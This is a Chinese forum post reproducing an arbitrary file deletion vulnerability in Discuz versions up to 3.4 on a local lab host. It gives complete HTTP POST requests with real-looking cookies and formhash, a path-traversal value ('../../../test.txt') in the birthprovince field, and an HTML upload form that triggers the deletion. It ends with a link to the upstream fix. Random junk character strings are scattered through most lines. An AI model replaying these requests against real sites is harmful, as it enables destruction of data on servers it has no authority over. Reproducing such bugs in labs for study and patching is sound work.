|
|
( T# x( A @. _; S! k
H; u3 S8 r# o5 e* s% f1 ~* F- `前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。
$ a6 T, w. m3 t. T( S2 J/ R7 r, }影响版本:Discuz < =3.4 环境
# P7 J7 o3 I8 d, F& Z# l
/ G% c: [2 E& T$ L6 c; R复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。- V- x& T$ {& l+ u+ u0 ^
新建test.txt
* R$ N# n8 q R$ ^8 f访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。
8 O7 ~4 m, |% K8 w! V2 z/ f; |: ?5 ~+ z& N' Y( ^) W9 ~
* [4 c6 L, J; a查看formhash
& z8 u4 y1 b3 n( S7 ^1 x) c利用burp抓包,获取cookie
+ V) |& D' \; O/ N( N4 _( p% X
( R2 E$ i# U' I) G/ ~1 \# T) Q* e+ b) ?8 E% ]
' g- s* l8 j% H4 T6 a F
& ?) \% A5 N v+ L0 w9 J6 i/ Z. F; c V
抓取cookie
2 Z, G* s0 U' Y& s1 @3 t* ?0 {
1 |; |7 x: i' w2 X9 i5 T6 d发送下面数据包:修改cookie,formhash,还有删除的文件
' r8 R1 g2 _" LPOST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
+ Q# I0 T" [, M' S8 S: @Host: localhost3 z, D# ?% f) B' d: W0 I/ g
Content-Length: 3673 F' p- J* f$ s5 ^
Cache-Control: max-age=0- b9 p& y5 O8 y0 `
Upgrade-Insecure-Requests: 1 c% I: i) ^6 a* b! v* I1 d- B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
" j% d7 {* k: q) bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.363 M( d1 B. ]8 |& C5 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.84 r8 N3 Z/ u3 P4 {% l4 w
Accept-Encoding: gzip, deflate
: F0 \, ?3 C' V# C, a: r# wAccept-Language: zh-CN,zh;q=0.8,en;q=0.6
" e& Y7 a7 n" \. UCookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C15779380565 b1 A8 J- f) f, t+ [: ]
Connection: close( Z1 Z; R: }0 S: d7 D5 S8 U
------WebKitFormBoundaryPFvXyxL45f34L12s1 L6 ?; e0 L) p
Content-Disposition: form-data; name="formhash"
! J) Y2 i& N* H& }) D- I84a7f376! C4 h! {- D- x
------WebKitFormBoundaryPFvXyxL45f34L12s
5 z1 n9 {2 t: L& uContent-Disposition: form-data; name="birthprovince"5 {7 Y$ w" p: e
../../../test.txt, B) T I; X- L# D0 R7 S1 G
------WebKitFormBoundaryPFvXyxL45f34L12s" E1 N) h& C$ w% y Z! T, ?+ U
Content-Disposition: form-data; name="profilesubmit"
9 f; ?6 W3 p* g: T3 I5 i. f% _1
: [; O' M$ ]8 \4 O" T2 B------WebKitFormBoundaryPFvXyxL45f34L12s--3 c2 C" B l% G0 j: {/ e
发送删除的数据包4 @7 q9 ?3 z5 k4 D
刷新页面,查看出生地就会显示成下图所示的状态:
2 t, {9 }" h/ q3 \数据成功写入$ _- V0 P" a8 V7 p0 @9 n# ^8 v( X# t
* |& G- g3 t! k0 X4 y4 f1 ?! C) `/ D2 P" o6 L& W% _. J Q
说明数据已经进入数据库:7 m& B4 X7 D9 Z/ a* e
然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:5 s# w7 w9 ^; M6 w; a
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">2 T- h, `. i2 K" O
<input type="file"name="birthprovince" id="file" />- @5 U9 U( P3 M
<input type="text"name="formhash" value="84a7f376"/></p>
: I6 J2 V, ~6 n2 t/ O. Y<input type="text"name="profilesubmit" value="1"/></p>
4 q- s+ @" @* V+ {<input type="submit"value="Submit" />9 \) @1 g2 ^% N+ g
</from>$ B3 R2 e0 Q" W3 a0 n& r
4 Y9 g5 r# j8 `9 N, @! M: \) i! K) o' z: i% B9 C, E ~
* n( N4 F# i- n- }) W
; r& [. J% Y( _0 G, {
3 l# T1 }" W& ^+ T
或者直接构建数据包:
/ x4 O1 z$ k; [- i0 ]. `& dPOST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.11 |3 Z' O- H9 [" K5 u$ y/ O
Host: 192.168.220.1314 C' l0 c, k0 I; W" ^4 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0/ R" {6 L; J. c$ n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
: z, p: a \' z8 \# ~" ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. _1 F7 B; p8 S5 D! _5 D
Accept-Encoding: gzip, deflate
$ g3 {! O& \$ @Content-Type: multipart/form-data; boundary=---------------------------123821742118716
" y+ s' x: j. s; A {; h$ vContent-Length: 919898 r, g0 Y2 t! a6 U3 p- c0 \3 O, n3 M
Connection: close
: T7 ], B5 |; D8 DCookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
; B$ |8 u) m' k4 x' bUpgrade-Insecure-Requests: 14 S, r4 m3 q# o& \* t( D& k6 X
-----------------------------123821742118716
1 y0 o4 ?7 v/ v& b4 ^& A8 Y% J: nContent-Disposition: form-data; name="birthprovince"; filename="0.jpg"# S& f4 K4 R8 L2 D' S5 K( _5 B
Content-Type: image/jpeg
: u" Y4 K3 y1 R" ] Y$ d6 Mzerba(这里写啥都可以)
3 n: I9 g6 u! V7 Y* B7 ^" v0 _) ]-----------------------------123821742118716--& F1 g' }9 R: x9 D* E8 [7 ]
! a6 v7 p# T3 x$ A
8 V- W0 m# r- c* E y2 x
0 ^: u( g, i! F% m' L0 `+ ~) I* M0 @! x, `0 q
: f, {2 Y' {) {/ t
9 p6 s: y1 x0 ]. K- m/ K" E
5 ?- S, `3 z# |% e0 ^7 \& R, y4 Y6 V+ W' m
5 V0 J2 A& X! A# M1 n
- z* A, ]1 W+ O* V4 z! c9 F
- |' E5 I9 V4 \# Z
进去discuz看看,可以看到,test.txt文件已经被删除了。
+ N1 E, p0 C) [9 z) j( s
5 V4 K0 N. A' ~! z* y S$ W" q+ ]; j& X" d6 J: U* Z: d8 n' L: [7 f
) ~4 y1 K6 I! w; N# M/ S9 c
! t" O/ p$ _# o, x1 f* R. P& z; Y$ e% M+ l* I
修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
7 C# n& J/ z7 \" b编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。
4 t+ ]9 H- ]2 r* e) m- x/ l7 M5 d, W6 A
& H3 Q. x% U! T$ b
, m- ^, ?/ A" [# z/ b5 i9 G
1 m) W4 z; n' O6 d( z2 I2 A4 ~4 p# k( Y/ O6 Y
0 D7 Y9 s6 J# x
. p. o8 @/ m/ |& B0 D, e( ^/ [1 d6 q/ Y3 s; f/ l& f
, s B( K& P# G0 b4 ~' Q+ s& ^ |
|
窥视卡
雷达卡
发表于 2022-6-25 08:59:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜